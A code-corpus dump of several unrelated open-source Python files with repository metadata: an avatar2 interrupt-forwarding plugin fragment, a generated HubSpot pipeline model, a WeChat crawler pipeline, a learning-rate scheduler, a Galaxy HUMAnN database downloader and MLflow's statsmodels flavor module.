def _handle_remote_interrupt_enter_message(self, message):
self._irq_dst.protocols.interrupts.send_interrupt_enter_response(message.id,
True)
if self._irq_src is None or self._irq_semi_forwarding is True:
return
status = self._irq_src.get_status()
if status['state'] == TargetStates.STOPPED:
self.log.info("Target stopped, restarting " + repr(message.origin))
try:
self._irq_src.cont(blocking=False)
except:
self.log.exception(" ")
@watch('RemoteInterruptExit')
def _handle_remote_interrupt_exit_message(self, message):
"""
Handle an interrupt exiting properly
If the interrupt was trigged by the hardware, we need to tell the
interrupt that we satisified it
:param self:
:param message:
:return:
"""
if self._irq_src is not None and self._irq_semi_forwarding is False:
# We are forwarding, make sure to forward the return
self._irq_src.protocols.interrupts.inject_exc_return(
message.transition_type)
# Always ack the exit message
self._irq_dst.protocols.interrupts.send_interrupt_exit_response(message.id,
True)
def _handle_remote_memory_write_message_nvic(self, message):
# NVIC address according to coresight manual
if message.address < 0xe000e000 or message.address > 0xe000f000 or self._irq_src is None:
return self._handle_remote_memory_write_message(message)
# Discard writes to the vector table offset registers
# TODO add other blacklists
if message.address == 0xE000ED08:
success = True
else:
success = self._irq_src.write_memory(message.address,
message.size,
message.value)
message.origin.protocols.remote_memory.send_response(message.id, 0,
success)
return message.id, message.value, success
def load_plugin(avatar):
if avatar.arch != ARMV7M:
avatar.log.error("Tried to load armv7-m interrupt plugin " +
"with mismatching architecture")
avatar.v7m_irq_rx_queue_name = '/avatar_v7m_irq_rx_queue'
avatar.v7m_irq_tx_queue_name = '/avatar_v7m_irq_tx_queue'
avatar.enable_interrupts = MethodType(enable_interrupt_forwarding, avatar)
avatar.watchmen.add_watchman('TargetInit', when=AFTER,
callback=add_protocols)
|
0bcb98cb77c4d644ac84b8978e1b458fc6d42a50
|
119646d6e1f13582c577fd7b87c9654839a0b806
|
/hubspot/crm/pipelines/models/pipeline_stage_patch_input.py
|
2a7e788e93eb0cb7c61132a45508503c785dc9e8
|
[] |
permissive
|
HubSpot/hubspot-api-python
|
446daaceeb3a6ce27edcd0414603c6d4bc07e327
|
d51a64c413461c0b82d8a41743e752d878747ca1
|
refs/heads/master
| 2023-08-31T09:52:56.583803
| 2023-08-07T11:00:27
| 2023-08-07T11:00:27
| 248,865,684
| 227
| 98
|
Apache-2.0
| 2023-09-14T15:25:19
| 2020-03-20T22:41:24
|
Python
|
UTF-8
|
Python
| false
| false
| 8,127
|
py
|
pipeline_stage_patch_input.py
|
# coding: utf-8
"""
CRM Pipelines
Pipelines represent distinct stages in a workflow, like closing a deal or servicing a support ticket. These endpoints provide access to read and modify pipelines in HubSpot. Pipelines support `deals` and `tickets` object types. ## Pipeline ID validation When calling endpoints that take pipelineId as a parameter, that ID must correspond to an existing, un-archived pipeline. Otherwise the request will fail with a `404 Not Found` response. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from hubspot.crm.pipelines.configuration import Configuration
class PipelineStagePatchInput(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"label": "str", "archived": "bool", "display_order": "int", "metadata": "dict[str, str]"}
attribute_map = {"label": "label", "archived": "archived", "display_order": "displayOrder", "metadata": "metadata"}
def __init__(self, label=None, archived=None, display_order=None, metadata=None, local_vars_configuration=None): # noqa: E501
"""PipelineStagePatchInput - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._label = None
self._archived = None
self._display_order = None
self._metadata = None
self.discriminator = None
if label is not None:
self.label = label
if archived is not None:
self.archived = archived
if display_order is not None:
self.display_order = display_order
self.metadata = metadata
@property
def label(self):
"""Gets the label of this PipelineStagePatchInput. # noqa: E501
A label used to organize pipeline stages in HubSpot's UI. Each pipeline stage's label must be unique within that pipeline. # noqa: E501
:return: The label of this PipelineStagePatchInput. # noqa: E501
:rtype: str
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this PipelineStagePatchInput.
A label used to organize pipeline stages in HubSpot's UI. Each pipeline stage's label must be unique within that pipeline. # noqa: E501
:param label: The label of this PipelineStagePatchInput. # noqa: E501
:type label: str
"""
self._label = label
@property
def archived(self):
"""Gets the archived of this PipelineStagePatchInput. # noqa: E501
Whether the pipeline is archived. # noqa: E501
:return: The archived of this PipelineStagePatchInput. # noqa: E501
:rtype: bool
"""
return self._archived
@archived.setter
def archived(self, archived):
"""Sets the archived of this PipelineStagePatchInput.
Whether the pipeline is archived. # noqa: E501
:param archived: The archived of this PipelineStagePatchInput. # noqa: E501
:type archived: bool
"""
self._archived = archived
@property
def display_order(self):
"""Gets the display_order of this PipelineStagePatchInput. # noqa: E501
The order for displaying this pipeline stage. If two pipeline stages have a matching `displayOrder`, they will be sorted alphabetically by label. # noqa: E501
:return: The display_order of this PipelineStagePatchInput. # noqa: E501
:rtype: int
"""
return self._display_order
@display_order.setter
def display_order(self, display_order):
"""Sets the display_order of this PipelineStagePatchInput.
The order for displaying this pipeline stage. If two pipeline stages have a matching `displayOrder`, they will be sorted alphabetically by label. # noqa: E501
:param display_order: The display_order of this PipelineStagePatchInput. # noqa: E501
:type display_order: int
"""
self._display_order = display_order
@property
def metadata(self):
"""Gets the metadata of this PipelineStagePatchInput. # noqa: E501
A JSON object containing properties that are not present on all object pipelines. For `deals` pipelines, the `probability` field is required (`{ \"probability\": 0.5 }`), and represents the likelihood a deal will close. Possible values are between 0.0 and 1.0 in increments of 0.1. For `tickets` pipelines, the `ticketState` field is optional (`{ \"ticketState\": \"OPEN\" }`), and represents whether the ticket remains open or has been closed by a member of your Support team. Possible values are `OPEN` or `CLOSED`. # noqa: E501
:return: The metadata of this PipelineStagePatchInput. # noqa: E501
:rtype: dict[str, str]
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this PipelineStagePatchInput.
A JSON object containing properties that are not present on all object pipelines. For `deals` pipelines, the `probability` field is required (`{ \"probability\": 0.5 }`), and represents the likelihood a deal will close. Possible values are between 0.0 and 1.0 in increments of 0.1. For `tickets` pipelines, the `ticketState` field is optional (`{ \"ticketState\": \"OPEN\" }`), and represents whether the ticket remains open or has been closed by a member of your Support team. Possible values are `OPEN` or `CLOSED`. # noqa: E501
:param metadata: The metadata of this PipelineStagePatchInput. # noqa: E501
:type metadata: dict[str, str]
"""
if self.local_vars_configuration.client_side_validation and metadata is None: # noqa: E501
raise ValueError("Invalid value for `metadata`, must not be `None`") # noqa: E501
self._metadata = metadata
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(lambda x: convert(x), value))
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], convert(item[1])), value.items()))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PipelineStagePatchInput):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, PipelineStagePatchInput):
return True
return self.to_dict() != other.to_dict()
|
eb02b29fadb92ac2c56eb66a785da265c76668a3
|
46732d613208ee4096fbbd3fd74f22146471d1ce
|
/weixin_crawler/project/crawler/crawler/pipelines/load_more.py
|
32c2ec8f94200c75033e0cd81c7a1e5d2f3abc06
|
[] |
no_license
|
cassieeric/python_crawler
|
7cb02f612382801ae024e2cee70e0c2bcdba927c
|
6d2b4db3d34183d729f6fd30555c6d6f04514260
|
refs/heads/master
| 2022-11-30T20:30:50.031960
| 2022-11-27T02:53:22
| 2022-11-27T02:53:22
| 118,204,154
| 322
| 283
| null | 2022-12-21T09:33:08
| 2018-01-20T03:17:14
|
HTML
|
UTF-8
|
Python
| false
| false
| 783
|
py
|
load_more.py
|
from db import update_article_from_template
from db import insert_many
class ResponseArticleListPipeline(object):
def __init__(self):
pass
def open_spider(self, spider):
pass
def process_item(self, item, spider):
article_list = item['article_list']
nickname = item['nickname']
tidy_article_list = []
for article in article_list:
tidy_article_list.append(update_article_from_template(article))
print(nickname,tidy_article_list)
has_update = insert_many(nickname, tidy_article_list)
if has_update == True:
print("文章列表已经最新")
spider.crawler.engine.close_spider(spider, '文章列表已经最新')
def close_spider(self, spider):
pass
|
b48f52f4b542d628543b0c37013e5c761b46c5f7
|
379ad926bb76a7732f5d43e15cc5b254ad608a8a
|
/profiler/translation/seq2seq/train/lr_scheduler.py
|
999f642c99e1f19e9e3ad1d3a9d0610982d5c58c
|
[
"MIT"
] |
permissive
|
msr-fiddle/pipedream
|
ed5ff9a823779ba63b64edc8955edc88b989e381
|
7db6a1c3e64996d5b319faec6ca38cb31bfea1c4
|
refs/heads/pipedream
| 2022-11-20T21:35:17.056988
| 2021-07-22T18:59:30
| 2021-07-22T18:59:30
| 203,689,837
| 356
| 125
|
MIT
| 2022-11-04T14:51:26
| 2019-08-22T01:18:23
|
Python
|
UTF-8
|
Python
| false
| false
| 1,731
|
py
|
lr_scheduler.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch
import math
class WarmupMultiStepLR(torch.optim.lr_scheduler._LRScheduler):
def __init__(
self,
optimizer,
lr_method="mlperf",
warmup_iters=100,
remain_steps=600,
decay_steps=100,
last_epoch=-1,
):
if lr_method not in ("none", "mlperf"):
raise ValueError(
"Only 'none' or 'mlperf' warmup_method accepted"
"got {}".format(lr_method)
)
self.lr_method = lr_method
self.warmup_iters = warmup_iters # iterations before it reaches base LR
self.remain_steps = remain_steps # iteration at which decay starts
self.decay_steps = decay_steps # number of steps between each decay
super(WarmupMultiStepLR, self).__init__(optimizer, last_epoch)
def get_lr(self):
if self.lr_method == "none":
return [base_lr for base_lr in self.base_lrs]
elif self.last_epoch <= self.warmup_iters:
# MLPerf warmup Inspired by https://arxiv.org/pdf/1706.03762.pdf (Section 5.3)
warmup_factor = math.exp(math.log(0.01) / self.warmup_iters)
inv_decay = warmup_factor ** (self.warmup_iters - self.last_epoch)
return [base_lr * inv_decay for base_lr in self.base_lrs]
elif self.last_epoch >= self.remain_steps:
num_decay_steps = min(int((self.last_epoch - self.remain_steps) / self.decay_steps) + 1, 4)
return [
base_lr * (0.5 ** num_decay_steps)
for base_lr in self.base_lrs
]
else:
return [base_lr for base_lr in self.base_lrs]
|
b7807574f8123cd437f6c29b61eec9623f75f8a2
|
977f7a7386899a5d0152b29b57ec26682b430437
|
/data_managers/data_manager_humann_database_downloader/data_manager/data_manager_humann_download.py
|
6723922b5c1e3e9932da270542096d627930a027
|
[
"MIT"
] |
permissive
|
galaxyproject/tools-iuc
|
0b87e21e1cb075ca6dc6b12622bc4e538a7c6507
|
96f8a533278b4b6394aebd7a8f537513b0d29b1a
|
refs/heads/main
| 2023-08-31T16:14:34.563541
| 2023-08-31T04:31:22
| 2023-08-31T04:31:22
| 23,992,530
| 164
| 508
|
MIT
| 2023-09-13T19:41:14
| 2014-09-13T11:18:49
|
HTML
|
UTF-8
|
Python
| false
| false
| 8,023
|
py
|
data_manager_humann_download.py
|
#!/usr/bin/env python
#
# Data manager for reference data for the 'humann' Galaxy tools
import argparse
import json
import subprocess
from datetime import date
from pathlib import Path
HUMANN_REFERENCE_DATA = {
"chocophlan": {
"full": "Full ChocoPhlAn for HUManN",
"DEMO": "Demo ChocoPhlAn for HUManN"
},
"uniref": {
"uniref50_diamond": "Full UniRef50 for HUManN",
"uniref50_ec_filtered_diamond": "EC-filtered UniRef50 for HUManN",
"uniref90_diamond": "Full UniRef90 for HUManN",
"uniref90_ec_filtered_diamond": "EC-filtered UniRef90 for HUManN",
"DEMO_diamond": "Demo UniRef for HUManN"
},
"utility_mapping": {
"full": {
"map_uniref50_uniref90": "Mapping (full) for UniRef50 from UniRef90",
"map_ko_uniref90": "Mapping (full) for KEGG Orthogroups (KOs) from UniRef90",
"map_eggnog_name": "Mapping (full) between EggNOG (including COGs) ids and names",
"map_uniref90_name": "Mapping (full) between UniRef90 ids and names",
"map_go_uniref90": "Mapping (full) for Gene Ontology (GO) from UniRef90",
"uniref90-tol-lca": "Mapping (full) for LCA for UniRef90",
"uniref50-tol-lca": "Mapping (full) for LCA for UniRef50",
"map_eggnog_uniref50": "Mapping (full) for EggNOG (including COGs) from UniRef50",
"map_pfam_uniref90": "Mapping (full) for Pfam domains from UniRef90",
"map_go_uniref50": "Mapping (full) for Gene Ontology (GO) from UniRef50",
"map_ko_name": "Mapping (full) between KEGG Orthogroups (KOs) ids and names",
"map_level4ec_uniref90": "Mapping (full) for Level-4 enzyme commission (EC) categories from UniRef90",
"map_go_name": "Mapping (full) between Gene Ontology (GO) ids and names",
"map_ko_uniref50": "Mapping (full) for KEGG Orthogroups (KOs) from UniRef50",
"map_level4ec_uniref50": "Mapping (full) for Level-4 enzyme commission (EC) categories from UniRef90",
"map_pfam_uniref50": "Mapping (full) for Pfam domains from UniRef50",
"map_eggnog_uniref90": "Mapping (full) for EggNOG (including COGs) from UniRef90",
"map_uniref50_name": "Mapping (full) between UniRef50 ids and names",
"map_ec_name": "Mapping (full) between Level-4 enzyme commission (EC) categories ids and names",
"map_pfam_name": "Mapping (full) between Pfam domains ids and names"
}
}
}
# Utility functions for interacting with Galaxy JSON
def read_input_json(json_fp):
"""Read the JSON supplied from the data manager tool
Returns a tuple (param_dict,extra_files_path)
'param_dict' is an arbitrary dictionary of parameters
input into the tool; 'extra_files_path' is the path
to a directory where output files must be put for the
receiving data manager to pick them up.
NB the directory pointed to by 'extra_files_path'
doesn't exist initially, it is the job of the script
to create it if necessary.
"""
with open(json_fp) as fh:
params = json.load(fh)
return (params['param_dict'],
Path(params['output_data'][0]['extra_files_path']))
# Utility functions for creating data table dictionaries
#
# Example usage:
# >>> d = create_data_tables_dict()
# >>> add_data_table(d,'my_data')
# >>> add_data_table_entry(dict(dbkey='hg19',value='human'))
# >>> add_data_table_entry(dict(dbkey='mm9',value='mouse'))
# >>> print(json.dumps(d))
def create_data_tables_dict():
"""Return a dictionary for storing data table information
Returns a dictionary that can be used with 'add_data_table'
and 'add_data_table_entry' to store information about a
data table. It can be converted to JSON to be sent back to
the data manager.
"""
d = {
'data_tables': {}
}
return d
def add_data_table(d, table):
"""Add a data table to the data tables dictionary
Creates a placeholder for a data table called 'table'.
"""
d['data_tables'][table] = []
def add_data_table_entry(d, table, entry):
"""Add an entry to a data table
Appends an entry to the data table 'table'. 'entry'
should be a dictionary where the keys are the names of
columns in the data table.
Raises an exception if the named data table doesn't
exist.
"""
try:
d['data_tables'][table].append(entry)
except KeyError:
raise Exception("add_data_table_entry: no table '%s'" % table)
def download_humann_db(data_tables, table_name, database, build, version, target_dp):
"""Download HUMAnN database
Creates references to the specified file(s) on the Galaxy
server in the appropriate data table (determined from the
file extension).
The 'data_tables' dictionary should have been created using
the 'create_data_tables_dict' and 'add_data_table' functions.
Arguments:
data_tables: a dictionary containing the data table info
table_name: name of the table
database: database to download (chocophlan or uniref)
build: build of the database to download
version: tool version
target_dp: directory to put copy or link to the data file
"""
db_target_dp = target_dp / Path(database)
db_dp = db_target_dp / Path(database)
build_target_dp = db_target_dp / Path(build)
# launch tool to get db
cmd = "humann_databases --download %s %s %s --update-config no" % (
database,
build,
db_target_dp)
subprocess.check_call(cmd, shell=True)
# move db
db_dp.rename(build_target_dp)
# add details to data table
if database != "utility_mapping":
add_data_table_entry(
data_tables,
table_name,
dict(
value="%s-%s-%s-%s" % (database, build, version, date.today().strftime("%d%m%Y")),
name=HUMANN_REFERENCE_DATA[database][build],
dbkey=version,
path=str(build_target_dp)))
elif args.database == "utility_mapping":
for x in build_target_dp.iterdir():
name = str(x.stem).split('.')[0]
add_data_table_entry(
data_tables,
table_name,
dict(
value="%s-%s-%s-%s-%s%s" % (database, build, name, version, date.today().strftime("%d%m%Y"), x.suffix),
name=HUMANN_REFERENCE_DATA["utility_mapping"][build][name],
dbkey=version,
path=str(x)))
if __name__ == "__main__":
print("Starting...")
# Read command line
parser = argparse.ArgumentParser(description='Download HUMAnN database')
parser.add_argument('--database', help="Database name")
parser.add_argument('--build', help="Build of the database")
parser.add_argument('--version', help="HUMAnN version")
parser.add_argument('--json', help="Path to JSON file")
args = parser.parse_args()
print("args : %s" % args)
# Read the input JSON
json_fp = Path(args.json)
params, target_dp = read_input_json(json_fp)
# Make the target directory
print("Making %s" % target_dp)
target_dp.mkdir(parents=True, exist_ok=True)
# Set up data tables dictionary
data_tables = create_data_tables_dict()
if args.database == "chocophlan":
table_name = 'humann_nucleotide_database'
elif args.database == "uniref":
table_name = 'humann_protein_database'
elif args.database == "utility_mapping":
table_name = 'humann_utility_mapping'
add_data_table(data_tables, table_name)
# Fetch data from specified data sources
print("Download and build database")
download_humann_db(
data_tables,
table_name,
args.database,
args.build,
args.version,
target_dp)
# Write output JSON
print("Outputting JSON")
with open(json_fp, 'w') as fh:
json.dump(data_tables, fh, sort_keys=True)
print("Done.")
|
8927fd7fa8b0bd1865f43c9b0995a06435a9bc14
|
7b7c570b30d6d7a0e9b904c7cb378cfb0d0f0e07
|
/mlflow/statsmodels.py
|
4720cc61e54b2416f4372b56106953e4dbd4d440
|
[
"Apache-2.0"
] |
permissive
|
mlflow/mlflow
|
ca97bfbbf32f8e59f454e428f5e46eb3d34d062f
|
37298ffafcd34002352d01d579d4524790544267
|
refs/heads/master
| 2023-09-01T13:15:53.902815
| 2023-09-01T09:00:42
| 2023-09-01T09:00:42
| 136,202,695
| 14,102
| 3,748
|
Apache-2.0
| 2023-09-14T21:52:42
| 2018-06-05T16:05:58
|
Python
|
UTF-8
|
Python
| false
| false
| 23,318
|
py
|
statsmodels.py
|
"""
The ``mlflow.statsmodels`` module provides an API for logging and loading statsmodels models.
This module exports statsmodels models with the following flavors:
statsmodels (native) format
This is the main flavor that can be loaded back into statsmodels, which relies on pickle
internally to serialize a model.
:py:mod:`mlflow.pyfunc`
Produced for use by generic pyfunc-based deployment tools and batch inference.
.. _statsmodels.base.model.Results:
https://www.statsmodels.org/stable/_modules/statsmodels/base/model.html#Results
"""
import inspect
import itertools
import logging
import os
from typing import Any, Dict, Optional
import yaml
import mlflow
from mlflow import pyfunc
from mlflow.exceptions import MlflowException
from mlflow.models import Model, ModelInputExample, ModelSignature
from mlflow.models.model import MLMODEL_FILE_NAME
from mlflow.models.signature import _infer_signature_from_input_example
from mlflow.models.utils import _save_example
from mlflow.tracking._model_registry import DEFAULT_AWAIT_MAX_SLEEP_SECONDS
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.utils.autologging_utils import (
autologging_integration,
get_autologging_config,
log_fn_args_as_params,
safe_patch,
)
from mlflow.utils.docstring_utils import LOG_MODEL_PARAM_DOCS, format_docstring
from mlflow.utils.environment import (
_CONDA_ENV_FILE_NAME,
_CONSTRAINTS_FILE_NAME,
_PYTHON_ENV_FILE_NAME,
_REQUIREMENTS_FILE_NAME,
_mlflow_conda_env,
_process_conda_env,
_process_pip_requirements,
_PythonEnv,
_validate_env_arguments,
)
from mlflow.utils.file_utils import write_to
from mlflow.utils.model_utils import (
_add_code_from_conf_to_system_path,
_get_flavor_configuration,
_validate_and_copy_code_paths,
_validate_and_prepare_target_save_path,
)
from mlflow.utils.requirements_utils import _get_pinned_requirement
from mlflow.utils.validation import _is_numeric
FLAVOR_NAME = "statsmodels"
STATSMODELS_DATA_SUBPATH = "model.statsmodels"
_logger = logging.getLogger(__name__)
def get_default_pip_requirements():
"""
:return: A list of default pip requirements for MLflow Models produced by this flavor.
Calls to :func:`save_model()` and :func:`log_model()` produce a pip environment
that, at minimum, contains these requirements.
"""
return [_get_pinned_requirement("statsmodels")]
def get_default_conda_env():
"""
:return: The default Conda environment for MLflow Models produced by calls to
:func:`save_model()` and :func:`log_model()`.
"""
return _mlflow_conda_env(additional_pip_deps=get_default_pip_requirements())
_model_size_threshold_for_emitting_warning = 100 * 1024 * 1024 # 100 MB
_save_model_called_from_autolog = False
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name=FLAVOR_NAME))
def save_model(
statsmodels_model,
path,
conda_env=None,
code_paths=None,
mlflow_model=None,
remove_data: bool = False,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
pip_requirements=None,
extra_pip_requirements=None,
metadata=None,
):
"""
Save a statsmodels model to a path on the local file system.
:param statsmodels_model: statsmodels model (an instance of `statsmodels.base.model.Results`_)
to be saved.
:param path: Local path where the model is to be saved.
:param conda_env: {{ conda_env }}
:param code_paths: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path when the model is loaded.
:param mlflow_model: :py:mod:`mlflow.models.Model` this flavor is being added to.
:param remove_data: bool. If False (default), then the instance is pickled without changes.
If True, then all arrays with length nobs are set to None before
pickling. See the remove_data method.
In some cases not all arrays will be set to None.
:param signature: {{ signature }}
:param input_example: {{ input_example }}
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
:param metadata: Custom metadata dictionary passed to the model and stored in the MLmodel file.
.. Note:: Experimental: This parameter may change or be removed in a future
release without warning.
"""
import statsmodels
_validate_env_arguments(conda_env, pip_requirements, extra_pip_requirements)
path = os.path.abspath(path)
_validate_and_prepare_target_save_path(path)
model_data_path = os.path.join(path, STATSMODELS_DATA_SUBPATH)
code_dir_subpath = _validate_and_copy_code_paths(code_paths, path)
if signature is None and input_example is not None:
wrapped_model = _StatsmodelsModelWrapper(statsmodels_model)
signature = _infer_signature_from_input_example(input_example, wrapped_model)
elif signature is False:
signature = None
if mlflow_model is None:
mlflow_model = Model()
if signature is not None:
mlflow_model.signature = signature
if input_example is not None:
_save_example(mlflow_model, input_example, path)
if metadata is not None:
mlflow_model.metadata = metadata
# Save a statsmodels model
statsmodels_model.save(model_data_path, remove_data)
if _save_model_called_from_autolog and not remove_data:
saved_model_size = os.path.getsize(model_data_path)
if saved_model_size >= _model_size_threshold_for_emitting_warning:
_logger.warning(
"The fitted model is larger than "
f"{_model_size_threshold_for_emitting_warning // (1024 * 1024)} MB, "
f"saving it as artifacts is time consuming.\n"
"To reduce model size, use `mlflow.statsmodels.autolog(log_models=False)` and "
"manually log model by "
'`mlflow.statsmodels.log_model(model, remove_data=True, artifact_path="model")`'
)
pyfunc.add_to_model(
mlflow_model,
loader_module="mlflow.statsmodels",
data=STATSMODELS_DATA_SUBPATH,
conda_env=_CONDA_ENV_FILE_NAME,
python_env=_PYTHON_ENV_FILE_NAME,
code=code_dir_subpath,
)
mlflow_model.add_flavor(
FLAVOR_NAME,
statsmodels_version=statsmodels.__version__,
data=STATSMODELS_DATA_SUBPATH,
code=code_dir_subpath,
)
mlflow_model.save(os.path.join(path, MLMODEL_FILE_NAME))
if conda_env is None:
if pip_requirements is None:
default_reqs = get_default_pip_requirements()
# To ensure `_load_pyfunc` can successfully load the model during the dependency
# inference, `mlflow_model.save` must be called beforehand to save an MLmodel file.
inferred_reqs = mlflow.models.infer_pip_requirements(
path,
FLAVOR_NAME,
fallback=default_reqs,
)
default_reqs = sorted(set(inferred_reqs).union(default_reqs))
else:
default_reqs = None
conda_env, pip_requirements, pip_constraints = _process_pip_requirements(
default_reqs,
pip_requirements,
extra_pip_requirements,
)
else:
conda_env, pip_requirements, pip_constraints = _process_conda_env(conda_env)
with open(os.path.join(path, _CONDA_ENV_FILE_NAME), "w") as f:
yaml.safe_dump(conda_env, stream=f, default_flow_style=False)
# Save `constraints.txt` if necessary
if pip_constraints:
write_to(os.path.join(path, _CONSTRAINTS_FILE_NAME), "\n".join(pip_constraints))
# Save `requirements.txt`
write_to(os.path.join(path, _REQUIREMENTS_FILE_NAME), "\n".join(pip_requirements))
_PythonEnv.current().to_yaml(os.path.join(path, _PYTHON_ENV_FILE_NAME))
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name=FLAVOR_NAME))
def log_model(
statsmodels_model,
artifact_path,
conda_env=None,
code_paths=None,
registered_model_name=None,
remove_data: bool = False,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
await_registration_for=DEFAULT_AWAIT_MAX_SLEEP_SECONDS,
pip_requirements=None,
extra_pip_requirements=None,
metadata=None,
**kwargs,
):
"""
Log a statsmodels model as an MLflow artifact for the current run.
:param statsmodels_model: statsmodels model (an instance of `statsmodels.base.model.Results`_)
to be saved.
:param artifact_path: Run-relative artifact path.
:param conda_env: {{ conda_env }}
:param code_paths: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path when the model is loaded.
:param registered_model_name: If given, create a model version under
``registered_model_name``, also creating a registered model if one
with the given name does not exist.
:param remove_data: bool. If False (default), then the instance is pickled without changes.
If True, then all arrays with length nobs are set to None before
pickling. See the remove_data method.
In some cases not all arrays will be set to None.
:param signature: {{ signature }}
:param input_example: {{ input_example }}
:param await_registration_for: Number of seconds to wait for the model version to finish
being created and is in ``READY`` status. By default, the function
waits for five minutes. Specify 0 or None to skip waiting.
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
:param metadata: Custom metadata dictionary passed to the model and stored in the MLmodel file.
.. Note:: Experimental: This parameter may change or be removed in a future
release without warning.
:return: A :py:class:`ModelInfo <mlflow.models.model.ModelInfo>` instance that contains the
metadata of the logged model.
"""
return Model.log(
artifact_path=artifact_path,
flavor=mlflow.statsmodels,
registered_model_name=registered_model_name,
statsmodels_model=statsmodels_model,
conda_env=conda_env,
code_paths=code_paths,
signature=signature,
input_example=input_example,
await_registration_for=await_registration_for,
remove_data=remove_data,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
metadata=metadata,
**kwargs,
)
def _load_model(path):
import statsmodels.iolib.api as smio
return smio.load_pickle(path)
def _load_pyfunc(path):
"""
Load PyFunc implementation. Called by ``pyfunc.load_model``.
:param path: Local filesystem path to the MLflow Model with the ``statsmodels`` flavor.
"""
return _StatsmodelsModelWrapper(_load_model(path))
def load_model(model_uri, dst_path=None):
"""
Load a statsmodels model from a local file or a run.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/tracking.html#
artifact-locations>`_.
:param dst_path: The local filesystem path to which to download the model artifact.
This directory must already exist. If unspecified, a local output
path will be created.
:return: A statsmodels model (an instance of `statsmodels.base.model.Results`_).
"""
local_model_path = _download_artifact_from_uri(artifact_uri=model_uri, output_path=dst_path)
flavor_conf = _get_flavor_configuration(model_path=local_model_path, flavor_name=FLAVOR_NAME)
_add_code_from_conf_to_system_path(local_model_path, flavor_conf)
statsmodels_model_file_path = os.path.join(
local_model_path, flavor_conf.get("data", STATSMODELS_DATA_SUBPATH)
)
return _load_model(path=statsmodels_model_file_path)
class _StatsmodelsModelWrapper:
def __init__(self, statsmodels_model):
self.statsmodels_model = statsmodels_model
def predict(
self, dataframe, params: Optional[Dict[str, Any]] = None # pylint: disable=unused-argument
):
"""
:param dataframe: Model input data.
:param params: Additional parameters to pass to the model for inference.
.. Note:: Experimental: This parameter may change or be removed in a future
release without warning.
:return: Model predictions.
"""
from statsmodels.tsa.base.tsa_model import TimeSeriesModel
model = self.statsmodels_model.model
if isinstance(model, TimeSeriesModel):
# Assume the inference dataframe has columns "start" and "end", and just one row
# TODO: move this to a specific mlflow.statsmodels.tsa flavor? Time series models
# often expect slightly different arguments to make predictions
if dataframe.shape[0] != 1 or not (
"start" in dataframe.columns and "end" in dataframe.columns
):
raise MlflowException(
"prediction dataframes for a TimeSeriesModel must have exactly one row"
+ " and include columns called start and end"
)
start_date = dataframe["start"][0]
end_date = dataframe["end"][0]
return self.statsmodels_model.predict(start=start_date, end=end_date)
else:
return self.statsmodels_model.predict(dataframe)
class AutologHelpers:
# Autologging should be done only in the fit function called by the user, but not
# inside other internal fit functions
should_autolog = True
# Currently we only autolog basic metrics
_autolog_metric_allowlist = [
"aic",
"bic",
"centered_tss",
"condition_number",
"df_model",
"df_resid",
"ess",
"f_pvalue",
"fvalue",
"llf",
"mse_model",
"mse_resid",
"mse_total",
"rsquared",
"rsquared_adj",
"scale",
"ssr",
"uncentered_tss",
]
def _get_autolog_metrics(fitted_model):
result_metrics = {}
failed_evaluating_metrics = set()
for metric in _autolog_metric_allowlist:
try:
if hasattr(fitted_model, metric):
metric_value = getattr(fitted_model, metric)
if _is_numeric(metric_value):
result_metrics[metric] = metric_value
except Exception:
failed_evaluating_metrics.add(metric)
if len(failed_evaluating_metrics) > 0:
_logger.warning(
f"Failed to autolog metrics: {', '.join(sorted(failed_evaluating_metrics))}."
)
return result_metrics
@autologging_integration(FLAVOR_NAME)
def autolog(
log_models=True,
log_datasets=True,
disable=False,
exclusive=False,
disable_for_unsupported_versions=False,
silent=False,
registered_model_name=None,
extra_tags=None,
): # pylint: disable=unused-argument
"""
Enables (or disables) and configures automatic logging from statsmodels to MLflow.
Logs the following:
- allowlisted metrics returned by method `fit` of any subclass of
statsmodels.base.model.Model, the allowlisted metrics including: {autolog_metric_allowlist}
- trained model.
